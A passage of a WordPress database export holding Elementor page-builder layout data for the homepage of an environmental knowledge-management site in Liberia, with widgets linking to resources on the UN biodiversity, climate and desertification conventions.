Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13155,2133,'_elementor_version','2.7.5'),(13156,2133,'_elementor_template_type','wp-page'),(13157,2133,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13159,2134,'_wp_page_template','default'),(13160,2134,'_elementor_edit_mode','builder'),(13161,2134,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(17,59,102,0.83)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":29,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas 